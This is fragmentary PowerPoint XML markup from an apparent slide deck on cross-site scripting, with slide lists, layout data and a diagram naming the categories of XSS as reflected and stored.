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sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="286" r:id="rId3"/>
    <p:sldId id="379" r:id="rId4"/>
    <p:sldId id="312" r:id="rId5"/>
    <p:sldId id="313" r:id="rId6"/>
    <p:sldId id="319" r:id="rId7"/>
    <p:sldId id="320" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="322" r:id="rId10"/>
    <p:sldId id="324" r:id="rId11"/>
    <p:sldId id="325" r:id="rId12"/>
    <p:sldId id="326" r:id="rId13"/>
    <p:sldId id="327" r:id="rId14"/>
    <p:sldId id="328" r:id="rId15"/>
    <p:sldId id="329" r:id="rId16"/>
    <p:sldId id="330" r:id="rId17"/>
    <p:sldId id="331"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9" r:id="rId34"/>
    <p:sldId id="350" r:id="rId35"/>
    <p:sldId id="351" r:id="rId36"/>
    <p:sldId id="352" r:id="rId37"/>
    <p:sldId id="353" r:id="rId38"/>
    <p:sldId id="354" r:id="rId39"/>
    <p:sldId id="355" r:id="rId40"/>
    <p:sldId id="356" r:id="rId41"/>
    <p:sldId id="357" r:id="rId42"/>
    <p:sldId id="358" r:id="rId43"/>
    <p:sldId id="360" r:id="rId44"/>
    <p:sldId id="361" r:id="rId45"/>
    <p:sldId id="362" r:id="rId46"/>
    <p:sldId id="363" r:id="rId47"/>
    <p:sldId id="364" r:id="rId48"/>
    <p:sldId id="382" r:id="rId49"/>
    <p:sldId id="367" r:id="rId50"/>
    <p:sldId id="368" r:id="rId51"/>
    <p:sldId id="373" r:id="rId52"/>
    <p:sldId id="283"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373"/>
    <a:srgbClr val="ECF1F8"/>
    <a:srgbClr val="0066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6" autoAdjust="0"/>
    <p:restoredTop sz="93178" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="1278" y="7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A1CAB-4CD7-41A1-914C-1CC92A6A4265}"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0B4AADEB-9FBD-4D86-BF26-47555158769A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>Categories of XSS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5294967F-8260-44D8-9D4C-5EEB1A95018F}" type="parTrans" cxnId="{CF57ECCD-5F3C-4D46-B71A-64C506D213D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E6F0771-0CCC-4DC8-910A-D0608BA6C8B8}" type="sibTrans" cxnId="{CF57ECCD-5F3C-4D46-B71A-64C506D213D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F1F3005-D254-4CF8-AF66-ADD79D04240C}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>Reflected XSS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E4F6D9C-957B-49EA-A72C-E24EFDA8D0C7}" type="parTrans" cxnId="{91032B70-7568-4A87-9ACD-3BF6B4BE6A15}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32C3BBF7-3AB1-4A09-AACA-E9511FC7C594}" type="sibTrans" cxnId="{91032B70-7568-4A87-9ACD-3BF6B4BE6A15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E0E3772-1FE6-4425-A8ED-6EBFA1D9FDD8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>Stored XSS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2AC6C48-0852-4078-9342-151748C0C986}" type="sibTrans" cxnId="{3606F296-CB71-41ED-86F4-854D06F23666}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8430ABA-6958-4905-825D-B0819A8C9082}" type="parTrans" cxnId="{3606F296-CB71-41ED-86F4-854D06F23666}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{385FD764-C367-4AE9-89B9-9EC0FB2DAB8A}" type="pres">
      <dgm:prSet presAssocID="{57AA1CAB-4CD7-41A1-914C-1CC92A6A4265}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C58FA559-3A86-4EED-8805-F97F02A3130A}" type="pres">
      <dgm:prSet presAssocID="{0B4AADEB-9FBD-4D86-BF26-47555158769A}" presName="root1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A0A1FB3D-E3C8-4D86-A0A2-CF4C128D737B}" type="pres">
      <dgm:prSet presAssocID="{0B4AADEB-9FBD-4D86-BF26-47555158769A}" presName="LevelOneTextNode" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E92C2AB5-10AD-4A4B-A8BF-9B7F69EADB4F}" type="pres">
      <dgm:prSet presAssocID="{0B4AADEB-9FBD-4D86-BF26-47555158769A}" presName="level2hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2EE1682F-966E-4F56-8B8F-5C58E0A77256}" type="pres">
      <dgm:prSet presAssocID="{9E4F6D9C-957B-49EA-A72C-E24EFDA8D0C7}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C66A733-A763-47DD-A46A-5188B1CA0BCB}" type="pres">
      <dgm:prSet presAssocID="{9E4F6D9C-957B-49EA-A72C-E24EFDA8D0C7}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE80536E-03B4-4EDD-BCD8-7EAF79E8DA5F}" type="pres">
      <dgm:prSet presAssocID="{7F1F3005-D254-4CF8-AF66-ADD79D04240C}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6B0E539A-99E4-41C4-86E3-DCE379362990}" type="pres">
      <dgm:prSet presAssocID="{7F1F3005-D254-4CF8-AF66-ADD79D04240C}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46088D28-3179-48E1-A1E9-049840F4A344}" type="pres">
      <dgm:prSet presAssocID="{7F1F3005-D254-4CF8-AF66-ADD79D04240C}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8C38C728-EC83-4D7E-8E83-CD2564B62F24}" type="pres">
      <dgm:prSet presAssocID="{D8430ABA-6958-4905-825D-B0819A8C9082}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60316716-4890-4F58-8C71-4EB932DC105E}" type="pres">
      <dgm:prSet presAssocID="{D8430ABA-6958-4905-825D-B0819A8C9082}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F765163A-6085-4C0C-9EAD-45B175A671E7}" type="pres">
      <dgm:prSet presAssocID="{7E0E3772-1FE6-4425-A8ED-6EBFA1D9FDD8}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78A6E7F9-98C4-4C84-BFB8-609DAF1E0F67}" type="pres">
      <dgm:prSet presAssocID="{7E0E3772-1FE6-4425-A8ED-6EBFA1D9FDD8}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BA1D2C6-0684-412B-BFE2-2C2DE7D210FE}" type="pres">
      <dgm:prSet presAssocID="{7E0E3772-1FE6-4425-A8ED-6EBFA1D9FDD8}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{FD9E84C7-2A91-4E2C-9F4E-77CCBE4548EE}" type="presOf" srcId="{D8430ABA-6958-4905-825D-B0819A8C9082}" destId="{60316716-4890-4F58-8C71-4EB932DC105E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{F31AE08F-7519-4625-B346-2F6A7E36951B}" type="presOf" srcId="{57AA1CAB-4CD7-41A1-914C-1CC92A6A4265}" destId="{385FD764-C367-4AE9-89B9-9EC0FB2DAB8A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{5DBA23AB-69A9-4ECD-AA2B-C517278618C6}" type="presOf" srcId="{9E4F6D9C-957B-49EA-A72C-E24EFDA8D0C7}" destId="{1C66A733-A763-47DD-A46A-5188B1CA0BCB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CC1D161B-3BD8-4B9B-86D5-81D0C11CAB96}" type="presOf" srcId="{0B4AADEB-9FBD-4D86-BF26-47555158769A}" destId="{A0A1FB3D-E3C8-4D86-A0A2-CF4C128D737B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CF57ECCD-5F3C-4D46-B71A-64C506D213D8}" srcId="{57AA1CAB-4CD7-41A1-914C-1CC92A6A4265}" destId="{0B4AADEB-9FBD-4D86-BF26-47555158769A}" srcOrd="0" destOrd="0" parTransId="{5294967F-8260-44D8-9D4C-5EEB1A95018F}" sibTransId="{3E6F0771-0CCC-4DC8-910A-D0608BA6C8B8}"/>
    <dgm:cxn modelId="{2F77E21A-727F-4CEE-87E2-59472D298729}" type="presOf" srcId="{D8430ABA-6958-4905-825D-B0819A8C9082}" destId="{8C38C728-EC83-4D7E-8E83-CD2564B62F24}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{F6645275-6C26-4A31-9C22-B5EFD07CC0D5}" type="presOf" srcId="{7F1F3005-D254-4CF8-AF66-ADD79D04240C}" destId="{6B0E539A-99E4-41C4-86E3-DCE379362990}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{39A0C3B8-E44C-46F5-A53B-5437D64AE7D9}" type="presOf" srcId="{7E0E3772-1FE6-4425-A8ED-6EBFA1D9FDD8}" destId="{78A6E7F9-98C4-4C84-BFB8-609DAF1E0F67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{3606F296-CB71-41ED-86F4-854D06F23666}" srcId="{0B4AADEB-9FBD-4D86-BF26-47555158769A}" destId="{7E0E3772-1FE6-4425-A8ED-6EBFA1D9FDD8}" srcOrd="1" destOrd="0" parTransId="{D8430ABA-6958-4905-825D-B0819A8C9082}" sibTransId="{D2AC6C48-0852-4078-9342-151748C0C986}"/>
    <dgm:cxn modelId="{91032B70-7568-4A87-9ACD-3BF6B4BE6A15}" srcId="{0B4AADEB-9FBD-4D86-BF26-47555158769A}" destId="{7F1F3005-D254-4CF8-AF66-ADD79D04240C}" srcOrd="0" destOrd="0" parTransId="{9E4F6D9C-957B-49EA-A72C-E24EFDA8D0C7}" sibTransId="{32C3BBF7-3AB1-4A09-AACA-E9511FC7C594}"/>
    <dgm:cxn modelId="{C584F3F1-4B1F-46FA-8F70-F651FE35358D}" type="presOf" srcId="{9E4F6D9C-957B-49EA-A72C-E24EFDA8D0C7}" destId="{2EE1682F-966E-4F56-8B8F-5C58E0A77256}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{706B789A-56FE-4583-9EC8-BC833A9EF9C7}" type="presParOf" srcId="{385FD764-C367-4AE9-89B9-9EC0FB2DAB8A}" destId="{C58FA559-3A86-4EED-8805-F97F02A3130A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{295A5900-AEC3-4913-AD01-8BEB04B63B46}" type="presParOf" srcId="{C58FA559-3A86-4EED-8805-F97F02A3130A}" destId="{A0A1FB3D-E3C8-4D86-A0A2-CF4C128D737B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{192D0FD6-A358-4DFF-A884-A1DD9A91A96B}" type="presParOf" srcId="{C58FA559-3A86-4EED-8805-F97F02A3130A}" destId="{E92C2AB5-10AD-4A4B-A8BF-9B7F69EADB4F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{A80D7A4A-8CEB-4C20-823C-2BC4655F3792}" type="presParOf" srcId="{E92C2AB5-10AD-4A4B-A8BF-9B7F69EADB4F}" destId="{2EE1682F-966E-4F56-8B8F-5C58E0A77256}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{34736FA4-0E22-44F1-83FA-100A868764C6}" type="presParOf" srcId="{2EE1682F-966E-4F56-8B8F-5C58E0A77256}" destId="{1C66A733-A763-47DD-A46A-5188B1CA0BCB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{FE744EAE-8240-4518-9F2B-F2CB44F5D165}" type="presParOf" srcId="{E92C2AB5-10AD-4A4B-A8BF-9B7F69EADB4F}" destId="{AE80536E-03B4-4EDD-BCD8-7EAF79E8DA5F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{A9A6AAE0-78DF-4D4D-A6EE-D06E4B9BC891}" type="presParOf" srcId="{AE80536E-03B4-4EDD-BCD8-7EAF79E8DA5F}" destId="{6B0E539A-99E4-41C4-86E3-DCE379362990}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C7C69699-1DDB-43A5-824D-A41942266F84}" type="presParOf" srcId="{AE80536E-03B4-4EDD-BCD8-7EAF79E8DA5F}" destId="{46088D28-3179-48E1-A1E9-049840F4A344}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7121AB90-99E1-442B-B89B-A32A0076EEC0}" type="presParOf" srcId="{E92C2AB5-10AD-4A4B-A8BF-9B7F69EADB4F}" destId="{8C38C728-EC83-4D7E-8E83-CD2564B62F24}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{BFB65959-9AF0-481A-A092-727D1F8D8B12}" type="presParOf" srcId="{8C38C728-EC83-4D7E-8E83-CD2564B62F24}" destId="{60316716-4890-4F58-8C71-4EB932DC105E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6B04D207-A142-42BC-8FE6-43C6B3CEDE78}" type="presParOf" srcId="{E92C2AB5-10AD-4A4B-A8BF-9B7F69EADB4F}" destId="{F765163A-6085-4C0C-9EAD-45B175A671E7}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{EB8EFEA1-1048-4FFC-B9C7-35499333EE77}" type="presParOf" srcId="{F765163A-6085-4C0C-9EAD-45B175A671E7}" destId="{78A6E7F9-98C4-4C84-BFB8-609DAF1E0F67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B3991655-C184-4EA9-81AF-CF94F72C020C}" type="presParOf" srcId="{F765163A-6085-4C0C-9EAD-45B175A671E7}" destId="{4BA1D2C6-0684-412B-BFE2-2C2DE7D210F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1FB3D-E3C8-4D86-A0A2-CF4C128D737B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1488" y="1008372"/>
          <a:ext cx="1808509" cy="90425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Categories of XSS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="27973" y="1034857"/>
        <a:ext cx="1755539" cy="851284"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2EE1682F-966E-4F56-8B8F-5C58E0A77256}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="19457599">
          <a:off x="1726262" y="1172665"/>
          <a:ext cx="890874" cy="55722"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="27861"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="890874" y="2786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2149428" y="1178254"/>
        <a:ext cx="44543" cy="44543"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6B0E539A-99E4-41C4-86E3-DCE379362990}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2533401" y="488426"/>
          <a:ext cx="1808509" cy="90425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Reflected XSS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2559886" y="514911"/>
        <a:ext cx="1755539" cy="851284"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8C38C728-EC83-4D7E-8E83-CD2564B62F24}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2142401">
          <a:off x="1726262" y="1692611"/>
          <a:ext cx="890874" cy="55722"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="27861"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="890874" y="2786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2149428" y="1698201"/>
        <a:ext cx="44543" cy="44543"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{78A6E7F9-98C4-4C84-BFB8-609DAF1E0F67}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2533401" y="1528319"/>
          <a:ext cx="1808509" cy="90425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Stored XSS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2559886" y="1554804"/>
        <a:ext cx="1755539" cy="8512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EF9B76E-FA31-4A55-B5EB-42037D6F8F71}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/13/2016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2BB9471-599B-4A47-BE0A-7972CDDF4B92}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366854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a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="777004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8DFCC3-1396-4149-804D-E2EF5E2141A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925012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8DFCC3-1396-4149-804D-E2EF5E2141A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3561344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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="935444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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1027852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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3554645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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="909620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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28681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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3495779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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1262786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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="704223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8DFCC3-1396-4149-804D-E2EF5E2141A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1341628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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="401047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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3313686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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2859834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29</a:t>
            </a:fld>
